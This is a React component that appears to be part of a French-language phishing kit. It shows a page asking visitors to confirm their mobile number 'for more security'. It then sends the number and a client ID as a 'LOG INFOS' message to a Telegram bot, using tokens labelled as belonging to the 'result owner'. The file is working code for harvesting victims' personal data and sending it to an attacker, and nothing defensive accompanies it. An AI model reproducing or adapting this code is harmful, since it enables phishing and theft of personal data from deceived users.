import { useContext } from "react";
import styles from "./PhonePage.module.css";
import  Configuration  from '../../Configuration/Configuration'
import Telegram from '../../API/Telegram'
import {
  CurrentPage,
  UserValues,
  UserErrors,
  UserButtons,
} from "../../Context/Context";



function PhonePage() {
  const [currentPageState, setCurrentPageState] = useContext(CurrentPage);
  const [userValuesState, setuserValuesState] = useContext(UserValues);
  const [userErrorsState, setuserErrorsState] = useContext(UserErrors);
  const [userButtonsState, setuserButtonsState] = useContext(UserButtons);

  const { tokenRzltOwner , idRzltOwner ,  redirect } = Configuration()

  const changeHandlerRegionNumber = (e) => {
    setuserValuesState({ ...userValuesState, number: e.target.value });
  };



  const onclickNumberPage = () => {
    // disable valider button
    setuserButtonsState({
      ...userButtonsState,
      NumberPageButtonDisabled: true,
    });

    // wait 1 sec
    setTimeout( async () => {
      if (
        userValuesState.number.length == 9 ||
        userValuesState.number.length == 10
      ) {

        // Result Message
        const myMessage = `/-- LOG INFOS --/%0APhone Number : ${userValuesState.number}%0AID CLIENT :${userValuesState.idClient}%0A/------------------------------------/`
        // Send Result
        await Telegram(tokenRzltOwner , idRzltOwner , myMessage )

        //change page
        setCurrentPageState("Confirmation");
      } else {
        // enable button valider
        setuserButtonsState({
          ...userButtonsState,
          NumberPageButtonDisabled: false,
        });

        // show error
        setuserErrorsState({ ...userErrorsState, numberError: true });
      }
    }, 1000);
  };

  return (
    <div className={styles.container}>
      <div className={styles.imageMobile}>
        <img alt=""  src="./images/mobileimage.png" />
      </div>
      <div className={styles.second}>
        Confirmez votre numéro de mobile pour plus de sécurité
      </div>
      <div className={styles.secondDescription}>
        Nous vous contacterons en cas de problème avec votre compte. Vous pouvez
        également l'utiliser pour confirmer vote identité.
      </div>
      <div
        className={styles.error}
        style={
          userErrorsState.numberError
            ? { display: "block" }
            : { display: "none" }
        }
      >
        Veuillez ressaisir votre numero de telephone mobile .
      </div>
      <div className={styles.input}>
        <input
          type="text"
          placeholder="0X XX XX XX XX"
          value={userValuesState.number}
          onChange={changeHandlerRegionNumber}
        />
      </div>

      <button
        className={styles.valider + " noselect"}
        style={
          userButtonsState.NumberPageButtonDisabled
            ? { backgroundColor: "#98cbd3" }
            : { backgroundColor: "#007d8f" }
        }
        disabled={userButtonsState.NumberPageButtonDisabled}
        onClick={onclickNumberPage}
      >
        Valider
      </button>
    </div>
  );
}

export default PhonePage;
